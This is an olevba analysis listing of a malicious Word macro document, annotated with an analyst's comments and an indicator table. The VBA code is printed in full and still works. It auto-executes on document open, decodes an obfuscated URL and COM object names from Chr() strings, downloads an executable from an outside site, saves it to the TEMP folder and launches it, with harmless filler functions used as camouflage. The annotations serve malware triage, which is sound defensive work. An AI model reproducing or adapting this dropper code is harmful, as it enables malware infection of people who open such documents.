- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIHB-V orderf~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: orderf~1.doc
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: olevba lists AutoOpen as "Runs when the Word document is opened".
- ' It does nothing except forward to VEeve, so the payload logic is not visible here.
- Sub autoopen()
- VEeve (8.2)
- End Sub
- ' Indirection layer between the auto-exec macro and the payload routine.
- ' The FFFFF argument is never read; the only effect is the call to TgU9h0l0q in Module1.
- Sub VEeve(FFFFF As Long)
- TgU9h0l0q
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' String constants used by the quoting / key-filter helper routines in this module.
- Public Const QUOTE = "'"
- Public Const QUOTE2 = "''"
- Public Const DOUBLE_QUOTE = """"
- ' Module-level state shared by the malicious routines: TgU9h0l0q stores the drop path here
- ' and ValidateString2 later passes it to the object it creates from "Shell.Application".
- Public rGlT7xRnM As String
- Public Const NUMERIC_KEYS = "-01234567890."
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Returns the larger of a and b.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
- If a > b Then
- Max = a
- Else
- Max = b
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Returns the smaller of a and b.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
- If a < b Then
- Min = a
- Else
- Min = b
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Clamps a to the range b..c: returns b when a < b, c when a > c, otherwise a.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
- If a < b Then
- Between = b
- ElseIf a > c Then
- Between = c
- Else
- Between = a
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Returns NullValue (default 0) when V is Null, otherwise V; errors are suppressed.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
- On Error Resume Next
- DBRead = IIf(IsNull(V), NullValue, V)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Downloader/dropper body, reached from autoopen via VEeve.
- ' Obfuscation: strings are assembled from Chr() codes with junk "<", "=" and ";" characters mixed
- ' in, the junk is removed with Replace() before use, and methods are invoked through CallByName
- ' so that names such as Open, Send and responseBody never appear as literals.
- ' Decoded behavior: HTTP GET of hxxp://solution-acouphene[.]fr/mini/mppy.exe (defanged here),
- ' response bytes saved as %TEMP%\ihhadnic.exe, then that file is opened via Shell.Application.
- ' Triage hints: both file names appear as IOCs in the olevba summary; on a host, look for
- ' ihhadnic.exe under the user's TEMP directory created shortly after the document was opened.
- Sub TgU9h0l0q()
- ' Payload URL, still containing the junk characters that the three Replace calls below strip.
- nByNDCCqAzBkEo = Chr(104) & Chr(116) & "<" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & ";" & Chr(47) & "s" & Chr(111) & Chr(108) & Chr(117) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(45) & Chr(97) & Chr(99) & Chr(111) & Chr(117) & Chr(112) & Chr(104) & Chr(101) & Chr(110) & Chr(101) & Chr(46) & Chr(102) & Chr(114) & Chr(47) & Chr(109) & Chr(105) & Chr(110) & Chr(105) & Chr(47) & Chr(109) & Chr(112) & Chr(112) & Chr(121) & Chr(46) & "e" & Chr(120) & Chr(101)
- ' ValidateString3 strips the junk and calls CreateObject; this argument decodes to "Microsoft.XMLHTTP".
- Set rUuJO37ZN3t = ValidateString3(Chr(77) & Chr(105) & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(59) & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))
- nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(60), "")
- nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(61), "")
- nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(59), "")
- ' Equivalent to <XMLHTTP>.Open "GET", <url>, False -- the False requests a synchronous call.
- CallByName rUuJO37ZN3t, "" + Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
- nByNDCCqAzBkEo _
- , False
- ' Decodes to "WScript.Shell"; used only to read the TEMP environment variable.
- Set NQwAQCRSizomP = ValidateString3(Chr(87) & Chr(60) & "S" & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(59) & Chr(46) & Chr(83) & "=" & Chr(104) & "e" & "<" & Chr(108) & Chr(108))
- ' Equivalent to <WScript.Shell>.Environment("Process").
- Set HU2f4J2c = CallByName(NQwAQCRSizomP, "E" & Chr(110) & Chr(118) & "i" & "r" & "o" & "n" & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
- ' Looks up "TEMP" in that environment collection.
- Z5pabTtIweA = HU2f4J2c("" + "T" & Chr(69) & Chr(77) & "P")
- ' Drop path = <TEMP> & "\ihhadnic.exe", kept in the module-level variable for the launch step.
- rGlT7xRnM = Z5pabTtIweA & "" + "\" & "i" & Chr(104) & Chr(104) & Chr(97) & Chr(100) & "n" & Chr(105) & Chr(99) & Chr(46) & "e" & Chr(120) & "e"
- Dim eCWgqNwtczezs() As Byte
- ' Method name decodes to "Send": issues the request prepared above.
- CallByName rUuJO37ZN3t, "" + Chr(83) & Chr(101) & Chr(110) & "d", VbMethod
- ' Property name decodes to "responseBody": the raw response bytes.
- eCWgqNwtczezs = CallByName(rUuJO37ZN3t, "" + Chr(114) & "e" & Chr(115) & "p" & Chr(111) & Chr(110) & "s" & Chr(101) & "B" & "o" & "d" & Chr(121), VbGet)
- ' Writes the downloaded bytes to the drop path (H8a5KfhNJe uses Adodb.Stream).
- H8a5KfhNJe eCWgqNwtczezs, rGlT7xRnM
- ' Control-flow obfuscation: the division by zero below is deliberate. It raises an error so that
- ' execution jumps to the kkiLwb6xLU handler, which is where the dropped file is launched.
- On Error GoTo kkiLwb6xLU
- a = 345 / 0
- On Error GoTo 0
- sMkc0xymfSCd:
- Exit Sub
- kkiLwb6xLU:
- ' ValidateString2 ignores this string argument and opens the path held in rGlT7xRnM.
- ValidateString2 ("qaMNp4efRqbw")
- Resume sMkc0xymfSCd
- End Sub
- '
- ' Returns Null when V equals NullValue (default 0), otherwise V; errors are suppressed.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
- On Error Resume Next
- DBWrite = IIf(V = NullValue, Null, V)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Converts Symbol to form acceptable by Sql syntax
- ' AGR'A -> 'AGR''A'
- '
- ' Wraps Symbol in single quotes and doubles every embedded single quote.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function QuotedSymbol(ByVal Symbol As String) As String
- QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Converts Symbol to standard form
- ' AGR''A -> AGR'A
- ' File-write helper for the dropper. The "Converts Symbol ..." comments surrounding it describe
- ' the neighbouring filler routines, not this function.
- ' PfWaLAWoFq4: data to write (TgU9h0l0q passes the HTTP response body bytes).
- ' rOvqV3q0jE:  destination path (TgU9h0l0q passes rGlT7xRnM, i.e. <TEMP>\ihhadnic.exe).
- Public Function H8a5KfhNJe(PfWaLAWoFq4 As Variant, rOvqV3q0jE As String)
- ' The argument decodes to "Adodb.Stream" once ValidateString3 removes "<", "=" and ";".
- Dim BxOUxRpIDhd: Set BxOUxRpIDhd = ValidateString3("A" & "<" & "d" & Chr(111) & Chr(59) & "d" & Chr(98) & Chr(61) & Chr(46) & Chr(83) & "t" & "=" & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & "m")
- ' Type = 1 selects binary mode (adTypeBinary), so the bytes are written unmodified.
- BxOUxRpIDhd.Type = 1
- BxOUxRpIDhd.Open
- BxOUxRpIDhd.write PfWaLAWoFq4
- ' Option 2 (adSaveCreateOverWrite) replaces any file already present at that path.
- BxOUxRpIDhd.savetofile rOvqV3q0jE, 2
- End Function
- ' AGR"A -> AGR'A
- '
- ' Rewrites Symbol in place (no ByVal, so the argument is passed by reference): replaces each
- ' doubled single quote, and each double quote, with one single quote.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Sub ValidStockSymbol(Symbol As String)
- Symbol = Replace(Symbol, QUOTE2, QUOTE)
- Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
- End Sub
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Key filter: sets KeyAscii to 0 when the code is above 31 and its character is not in
- ' NUMERIC_KEYS; codes of 31 and below are left unchanged.
- ' Filler code: not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Sub NumericFilter(KeyAscii As Integer)
- If KeyAscii > 31 Then
- If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
- KeyAscii = 0
- End If
- End If
- End Sub
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' CURRENCY 8 bytes
- ' A scaled integer between
- ' – 922,337,203,685,477.5808
- ' and 922,337,203,685,477.5807
- '
- ' We restrict it to be
- ' - positive
- ' - integer i.e. no fractions
- ' - not more than 14 symbols
- ' so it can be from 1 to 99 999 999 999 999
- '
- ' Filters the text of a control through ValidateString (max length 14) and returns it as Currency,
- ' or 0 when the conversion fails.
- ' NOTE(review): ss, d and de are not declared anywhere in this listing and TC is a String
- ' parameter, so ss.TC / d.TC / de.TC cannot resolve as written; presumably the original control
- ' references were altered when this routine was reused as filler -- confirm against the sample.
- ' Not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function ValidateCurrency(TC As String)
- Dim S As String
- Dim i As Long
- On Error Resume Next
- '////////////////////////
- ' Restrict user input '/
- '//////////////////////
- With ss.TC
- i = .SelStart
- S = ValidateString(.Text, False, False, False, 14, 0)
- .Text = S
- .SelStart = i
- End With
- '///////////////////////
- ' Convert user input '/
- '/////////////////////
- On Error GoTo Fail
- ValidateCurrency = CCur(d.TC.Text)
- Exit Function
- Fail:
- On Error Resume Next
- de.TC.Text = ""
- ValidateCurrency = 0
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Despite its name this validates nothing: it is the string de-obfuscator and COM object factory
- ' used by every malicious routine in this module.
- ' It removes "<" (Chr 60), "=" (Chr 61) and ";" (Chr 59) from the argument and returns
- ' CreateObject(<cleaned ProgID>). ProgIDs passed in this listing decode to Microsoft.XMLHTTP,
- ' WScript.Shell, Adodb.Stream and Shell.Application.
- ' The single CreateObject call here is why olevba reports that keyword without naming the objects.
- Public Function ValidateString3(t5Ls3vWT9kn82Y As String)
- t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(60), "")
- t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(61), "")
- t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(59), "")
- Set ValidateString3 = CreateObject("" + t5Ls3vWT9kn82Y)
- End Function
- ' Filters a control's text through ValidateString (fractions allowed, max length 10,
- ' max value 1000000000) and returns Val() of the result.
- ' NOTE(review): dw is not declared anywhere in this listing and TC is a String parameter, so
- ' dw.TC cannot resolve as written; errors are hidden by On Error Resume Next.
- ' Not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function ValidatePrice(TC As String) As Double
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With dw.TC
- ' Validating UserInput
- i = .SelStart
- S = ValidateString(.Text, False, False, True, 10, 1000000000)
- ' s = VBCleanEntry(.Text, ".", 2)
- .Text = S
- .SelStart = i
- ValidatePrice = Val(.Text)
- End With
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Filters a control's text through ValidateString (no fractions, max length 10,
- ' max value 1000000000) and returns Val() of the result.
- ' NOTE(review): dw is not declared anywhere in this listing and TC is a String parameter, so
- ' dw.TC cannot resolve as written; errors are hidden by On Error Resume Next.
- ' Not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function ValidateAmount(TC As String) As Long
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With dw.TC
- ' Validating UserInput
- i = .SelStart
- S = ValidateString(.Text, False, False, False, 10, 1000000000)
- ' s = VBCleanEntry(.Text, ".", 2)
- .Text = S
- .SelStart = i
- ValidateAmount = Val(.Text)
- End With
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- ' Filters a control's text through ValidateString (zero and fractions allowed, max length 6,
- ' max value 100), keeps at most two digits after the decimal point, and returns Val() of the result.
- ' NOTE(review): dd is not declared anywhere in this listing and TC is a String parameter, so
- ' dd.TC cannot resolve as written; errors are hidden by On Error Resume Next.
- ' Not referenced by the autoopen -> VEeve -> TgU9h0l0q call chain in this listing.
- Public Function ValidatePercent(TC As String) As Double
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With dd.TC
- i = .SelStart
- S = ValidateString(.Text, False, True, True, 6, 100)
- Dim j As Long
- j = InStr(S, ".")
- If j > 0 Then
- Dim f As String
- Dim g As String
- f = Mid(S, j + 1)
- ' Truncate the fractional part to two characters.
- If Len(f) > 2 Then
- f = Left(f, 2)
- End If
- g = Left(S, j - 1)
- S = g & "." & f
- End If
- .Text = S
- .SelStart = i
- ValidatePercent = Val(.Text)
- End With
- End Function
- ' -------------------------------------------------------------
- ' function validates parsed string
- ' Use it on Change Event
- ' Execution step of the dropper, named to blend in with the filler Validate* routines. The
- ' "function validates parsed string" comment above it describes ValidateString, not this code.
- ' The pq5Q05lvWOS32 argument is never read.
- Public Function ValidateString2(pq5Q05lvWOS32 As String)
- ' The argument decodes to "Shell.Application" once ValidateString3 removes "<", "=" and ";".
- Set k69VPFQVKj0nQ = ValidateString3(Chr(83) & "h" & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
- With k69VPFQVKj0nQ
- ' Opens the path in module-level rGlT7xRnM, which TgU9h0l0q set to <TEMP>\ihhadnic.exe;
- ' this is the point where the downloaded executable is started.
- .Open (rGlT7xRnM)
- End With
- End Function
- ' © 2000 Dmitry Grechishkin, grechishkin@egartech.com
- ' Numeric input filter: returns strInputString trimmed and with disallowed characters removed.
- '   blnAllowNegative  - accept "-" as the first character
- '   blnAllowZero      - accept "0" as the first character
- '   blnAllowFractions - accept one decimal separator; "," is rewritten to "."
- '   lngMaxLen         - when > 0, cut the value to this many characters (ignoring "-")
- '   lngMaxValue       - when > 0, drop the last character once Abs(Val(...)) exceeds it
- ' The function result is assigned only when the trimmed input is non-empty.
- ' Called by the ValidateCurrency/Price/Amount/Percent filler routines; it is not referenced by
- ' the autoopen -> VEeve -> TgU9h0l0q call chain and does not share logic with ValidateString2
- ' or ValidateString3, which only borrow its name.
- Public Function ValidateString( _
- strInputString As String, _
- blnAllowNegative As Boolean, _
- blnAllowZero As Boolean, _
- blnAllowFractions As Boolean, _
- Optional lngMaxLen As Long = 0, _
- Optional lngMaxValue As Long = 0 _
- ) As String
- Dim strTmpValue As String
- Dim strCurrentSymbol As String
- Dim strLeftStroke As String
- Dim strRightStroke As String
- Dim lngLenght As Long
- Dim lngDotPosition As Long
- Dim blnInvalidSymbol As Boolean
- Dim blnCorrectDot As Boolean
- Dim i As Long
- Dim j As Long
- On Error Resume Next
- strTmpValue = Trim$(strInputString)
- lngLenght = Len(strTmpValue)
- If lngLenght > 0 Then
- ' ---------------------
- ' Validates user input independently from locals and uses ',' or '.' as decimal separator
- For i = 1 To lngLenght
- blnInvalidSymbol = True
- '
- If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
- Mid$(strTmpValue, i, 1) = "."
- End If
- strCurrentSymbol = Mid$(strTmpValue, i, 1)
- ' Truncates value if it exeeds max value
- If lngMaxValue > 0 Then
- If Abs(Val(strTmpValue)) > lngMaxValue Then
- strTmpValue = Left$(strTmpValue, lngLenght - 1)
- blnInvalidSymbol = True
- GoTo EX
- End If
- End If
- If lngMaxLen > 0 Then
- ' If negative values are allowed to be inputted
- If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
- strTmpValue = Left$(strTmpValue, lngMaxLen)
- blnInvalidSymbol = True
- GoTo EX
- End If
- End If
- If i = 1 Then
- If blnAllowNegative And (strCurrentSymbol = "-") Then
- blnInvalidSymbol = False
- GoTo Check
- End If
- ' if zero values are allowed to input
- If Not blnAllowZero And (strCurrentSymbol = "0") Then
- blnInvalidSymbol = True
- GoTo Check
- End If
- End If
- ' --------------------------
- ' numeric validation
- For j = 0 To 9
- If strCurrentSymbol = Trim$(Str$(j)) Then
- blnInvalidSymbol = False
- GoTo Check
- End If
- Next
- ' --------------------------
- ' decimal separator is single in string
- If (lngDotPosition > 0) Then
- If (lngDotPosition = i) Then
- blnCorrectDot = True
- Else
- blnCorrectDot = False
- End If
- Else
- blnCorrectDot = True
- End If
- If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
- blnInvalidSymbol = False
- lngDotPosition = i
- GoTo Check
- End If
- Check:
- ' If any invalid symbol is found, cut it away
- If blnInvalidSymbol Then
- strLeftStroke = Left$(strTmpValue, i - 1)
- strRightStroke = Right$(strTmpValue, lngLenght - i)
- strTmpValue = strLeftStroke + strRightStroke
- End If
- Next
- ' ---------------------
- EX:
- ValidateString = strTmpValue
- End If
- On Error GoTo 0
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Open | May open a file (obfuscation: VBA |
- | | | expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | mppy.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | IOC | ihhadnic.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+